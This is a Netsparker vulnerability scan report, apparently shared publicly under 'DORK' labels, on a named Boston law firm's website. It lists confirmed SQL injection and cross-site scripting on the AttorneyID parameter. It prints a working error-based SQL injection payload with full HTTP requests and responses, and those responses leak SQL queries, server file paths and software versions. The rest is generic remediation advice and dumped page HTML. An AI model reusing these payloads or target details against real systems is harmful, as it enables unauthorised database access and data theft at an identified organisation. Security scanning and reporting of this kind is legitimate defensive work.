Netsparker, Web Application Security Scanner

SQL Injection SUMMARY for nutter.com, XSS, DORK

Loading

Netsparker - Scan Report Summary
TARGET URL
http://www.nutter.com/attorneys.php?AttorneyI...
SCAN DATE
4/19/2011 8:10:01 PM
REPORT DATE
4/19/2011 8:43:32 PM
SCAN DURATION
00:13:53

Total Requests

Average Speed

req/sec.
11
identified
4
confirmed
2
critical
3
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
18 %
IMPORTANT
18 %
LOW
36 %
INFORMATION
27 %

GHDB, DORK VULNERABILITIES

GHDB, DORK VULNERABILITIES
URL Parameter Method Vulnerability Confirmed
/attorneys.php AttorneyID GET SQL Injection Yes
AttorneyID GET [Probable] SQL Injection No
AttorneyID GET Cross-site Scripting Yes
Database User Has Admin Privileges Yes
Apache Version Disclosure No
PHP Version Disclosure No
AttorneyID GET Database Error Message No
AttorneyID GET Programming Error Message No
MySQL Database Identified Yes
E-mail Address Disclosure No
[Possible] Internal Path Leakage (*nix) No
SQL Injection

SQL Injection

1 TOTAL
CRITICAL
CONFIRMED
1
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /attorneys.php

/attorneys.php CONFIRMED

http://www.nutter.com/attorneys.php?AttorneyID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(..

Parameters

Parameter Type Value
AttorneyID GET (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

Request

GET /attorneys.php?AttorneyID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nutter.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:11:39 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Transfer-Encoding: chunked
Content-Type: text/html


error: Duplicate entry '_!@4dilemma:1' for key 1 | 1062<BR>sql: SELECT FirstName,LastName FROM attorneys WHERE AttorneyID=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))<br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /usr/local/apache/pnc_nutter/pointclique/maintenance/_libs/lib.php:68) in <b>/usr/local/apache/htdocs/attorneys.php</b> on line <b>16</b><br /><!-- attorneys start --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><!--Attorneys : Nutter McClennen & Fish LLP--> <title>Attorneys : Nutter McClennen & Fish LLP</title><!-- <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." />--> <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.attorneys.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.attorneys.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start -->
<div id="printHeader">
<img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/>
</div>
<div id="bodyContainer">
<div id="headerArea">
<ul>
<li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li>
<li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li>
<li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li>
</ul>
<form method="get" id="searchField" action="http://www.nutter.com/search.php">
<div id="siteSearch">
<input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/>
</div>
</form>
</div>
<!-- header end -->
<!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <!-- Start Right Ads --><div id="Ads"> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent1", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"); adfo.write("adFlashContent1"); </script> </div> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent2", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"); adfo.write("adFlashContent2"); </script> </div><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent">
<ul id="industryNav"> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=6" title="Life Sciences" id="keyLife"><span>LIFE SCIENCES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=4" title="Financial Services" id="keyFinance"><span>FINANCIAL SERVICES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=13" title="Real Estate" id="keyReal"><span>REAL ESTATE</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=10" title="Manufacturing" id="keyManufacture"><span>MANUFACTURING</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=15" title="Technology" id="keyTech"><span>TECHNOLOGY</span></a></li> <li><a href="http://www.nutter.com/client_services.php" title="More" id="keyMore"><span>MORE</span></a></li></ul><img src="/media/aboutus/media.209.jpg" width="450" height="124" id="smallImage"><h2><img src="/media/aboutus/media.226.gif" border="0" title="" alt=""></h2><span><img src="http://www.nutter.com/media/images/search_for_an.gif" alt="Search For An Attorney"/></span><div id="Alpha"><a href="http://www.nutter.com/attorneys.php?letter=A">A</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=B">B</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=C">C</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=D">D</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=E">E</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=F">F</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=G">G</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=H">H</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=I">I</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=J">J</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=K">K</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=L">L</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=M">M</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=N">N</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=O">O</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=P">P</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Q">Q</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=R">R</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=S">S</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=T">T</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=U">U</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=V">V</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=W">W</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=X">X</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Y">Y</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=Z">Z</a></div><form method="post" action="http://www.nutter.com/attorneys.php"> <table cellpadding="0" cellspacing="0" id="Form"> <tr> <td><label for="FirstName">First Name</label></td> <td><input type="text" name="FirstName" value="" id="FirstName"/></td> <td><label for="LastName">Last Name</label></td> <td><input type="text" name="LastName" value="" id="LastName"/></td> <td></td> </tr> <tr> <td><label for="Keywords">Keywords</label></td> <td colspan="3"><input type="text" name="Keyword" value="" id="Keywords"/></td> <td><input type="image" src="/media/images/attorney_go_button.gif" name="Submit" id="Go"/></td> </tr> </table> <div id="subMenus"> <ul id="menuList"> <li> <a href="javascript:void(0)" title="Practice Area" id="Practice" class="subLinks">Practice Area</a> <ul class="subCategoriesScroll" onmouseover="colorItem('Practice', 'subHover')" onmouseout="colorItem('Practice', 'subLinks')"> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=2" title="Antitrust">Antitrust</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=3" title="Banking and Financial Services">Banking and Financial Services</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=5" title="Business/General Corporate">Business/General Corporate</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=6" title="Commercial Finance">Commercial Finance</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=7" title="Education">Education</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=8" title="Emerging Companies/High Technology">Emerging Companies/High Technology</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=37" title="Energy Law">Energy Law</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=10" title="Environmental Law">Environmental Law</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=11" title="Government Investigations and White Collar Defense">Government Investigations and White Collar Defense</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=13" title="Hedge Funds">Hedge Funds</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=15" title="Intellectual Property">Intellectual Property</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=16" title="IP Litigation">IP Litigation</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=9" title="Labor, Employment and Benefits">Labor, Employment and Benefits</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=17" title="Land Use, Permitting and Development">Land Use, Permitting and Development</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=19" title="Litigation">Litigation</a></li> <li><a href="http://www.nutter.com/attorneys.php?PracticeID=34" title="Litigation: Data Security Breach and Privacy">Litigation: Data Security Breach and Privacy</a></l..
[Probable] SQL Injection

[Probable] SQL Injection

1 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /attorneys.php

/attorneys.php

http://www.nutter.com/attorneys.php?AttorneyID=%2527

Parameters

Parameter Type Value
AttorneyID GET %27

Request

GET /attorneys.php?AttorneyID=%2527 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nutter.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:09:32 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Transfer-Encoding: chunked
Content-Type: text/html


error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%27' at line 1 | 1064<BR>sql: SELECT FirstName,LastName FROM attorneys WHERE AttorneyID=%27<br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /usr/local/apache/pnc_nutter/pointclique/maintenance/_libs/lib.php:68) in <b>/usr/local/apache/htdocs/attorneys.php</b> on line <b>16</b><br /><!-- attorneys start --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" ><head><meta name="google-site-verification" content="aSIXeItWGw2SQPO6rIkdjASym5HnHabHM71ZCR6d0oU" /><!--Attorneys : Nutter McClennen & Fish LLP--> <title>Attorneys : Nutter McClennen & Fish LLP</title><!-- <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." />--> <meta name="keywords" content="keywords: Nutter McClennen & Fish, Pharmaceutical medical devices, Financial services, Real Estate lawyers, Technology attorneys, Business lawyers, Boston law firm, Louis Brandeis, Patent and trademark, Government enforcement defense, Products liability defense" /> <meta name="description" content="description: Leading Boston business law firm serving life sciences, financial services, real estate, technology and other industrues." /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.main.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/custom.css.php" media="screen" /><!-- <link rel="Stylesheet" rev="Stylesheet" href="/custom.temp.css" media="screen" /> --> <link rel="Stylesheet" rev="Stylesheet" href="/_css/stylesheet.attorneys.css" media="screen" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.main.css" media="print" /> <link rel="Stylesheet" rev="Stylesheet" href="/_css/printstyle.attorneys.css" media="print" /> <link rel="icon" type="image/png" href="/media/images/NM-favicon.ico" /><script src="_libs/libs.global.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.flash-fix.js" type="text/javascript" language="javascript"></script><script src="_libs/libs.subCategories.js" type="text/javascript" language="javascript"></script><script type="text/javascript">// topnav_biographies_off= new Image();// topnav_biographies_off.src = "/maintenance/media/topnav_biographies.gif";</script></head><body><!-- header start -->
<div id="printHeader">
<img src="http://www.nutter.com/media/images/nutter_logo_print.gif"/>
</div>
<div id="bodyContainer">
<div id="headerArea">
<ul>
<li><a href="http://www.nutter.com/home.php" title="Home" onmouseover="rollover('Home', 'http://www.nutter.com/media/images/home_over.gif')" onmouseout="rollover('Home', 'http://www.nutter.com/media/images/home.gif')"><img src="http://www.nutter.com/media/images/home.gif" alt="Home" name="Home"/></a></li>
<li><a href="http://www.nutter.com/contact.php" title="Contact Us" onmouseover="rollover('contact', 'http://www.nutter.com/media/images/contact_us_over.gif')" onmouseout="rollover('contact', 'http://www.nutter.com/media/images/contact_us.gif')"><img src="http://www.nutter.com/media/images/contact_us.gif" alt="Contact Us" name="contact"/></a></li>
<li><label for="Search" onmouseover="rollover('search', 'http://www.nutter.com/media/images/search_over.gif')" onmouseout="rollover('search', 'http://www.nutter.com/media/images/search.gif')"><img src="http://www.nutter.com/media/images/search.gif" alt="Search" name="search"/></label></li>
</ul>
<form method="get" id="searchField" action="http://www.nutter.com/search.php">
<div id="siteSearch">
<input type="text" name="query" id="Search"/><input type="image" src="/media/images/button_arrow_blue.gif" name="Submit" title="Go" id="Submit"/>
</div>
</form>
</div>
<!-- header end -->
<!-- body start --><!-- 2009.10.5, Ye Wang: Debug db <div style="border:2px solid green; display:block;clear:both;float:none;margin:5em 0;margin-bottom:1em"> <br clear="all" /></div><br clear="all" /> ---> <!-- END OF DEBUGGING --><div id="Container"> <!-- Start Right Ads --><div id="Ads"> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent1"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent1", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.240.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.241.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fkey_industries.php%3FIndustryID%3D19"); adfo.write("adFlashContent1"); </script> </div> <div class="adBlock"> <!--- <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="114" height="83" border="0"> <param name="movie" value="/media/swf/NM-banner.swf" /> <param name="quality" value="high" /> <param name="flashvars" value="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"/> <embed border="0" src="/media/swf/NM-banner.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="114" height="83" flashvars="&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"></embed> <noembed><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></noembed> </object> ---> <!--- This is a fix so that users don't have to click on flash image to activate it ---> <div id="adFlashContent2"><a href="http://www.macromedia.com/go/getflashplayer" title="Download Macromedia Flash">Get Flash</a></div> <script type="text/javascript"> var adfo = new FlashObject("/media/swf/NM-banner.swf", "adFlashContent2", "114", "83", "6", "#000000"); adfo.addVariable("flashvars", "&image1=%2Fmedia%2Faboutus%2Fmedia.242.jpg&image2=%2Fmedia%2Faboutus%2Fmedia.243.jpg&goUrl=http%3A%2F%2Fnutter1.securesites.net%2Fabout.php%3FAboutusID%3D3"); adfo.write("adFlashContent2"); </script> </div><!-- dkoleba 2010/11/10 start --><!-- dkoleba 2010/11/10 end --></div><!-- End Right Ads --> <div id="mainContent">
<ul id="industryNav"> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=6" title="Life Sciences" id="keyLife"><span>LIFE SCIENCES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=4" title="Financial Services" id="keyFinance"><span>FINANCIAL SERVICES</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=13" title="Real Estate" id="keyReal"><span>REAL ESTATE</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=10" title="Manufacturing" id="keyManufacture"><span>MANUFACTURING</span></a></li> <li><a href="http://www.nutter.com/key_industries.php?IndustryID=15" title="Technology" id="keyTech"><span>TECHNOLOGY</span></a></li> <li><a href="http://www.nutter.com/client_services.php" title="More" id="keyMore"><span>MORE</span></a></li></ul><img src="/media/aboutus/media.209.jpg" width="450" height="124" id="smallImage"><h2><img src="/media/aboutus/media.226.gif" border="0" title="" alt=""></h2><span><img src="http://www.nutter.com/media/images/search_for_an.gif" alt="Search For An Attorney"/></span><div id="Alpha"><a href="http://www.nutter.com/attorneys.php?letter=A">A</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=B">B</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=C">C</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=D">D</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=E">E</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=F">F</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=G">G</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=H">H</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=I">I</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=J">J</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=K">K</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=L">L</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=M">M</a>&nbsp;&nbsp;&nbsp;<a href="http://www.nutter.com/attorneys.php?letter=N">N</a>&nbsp;&nbsp;&nbsp;<a 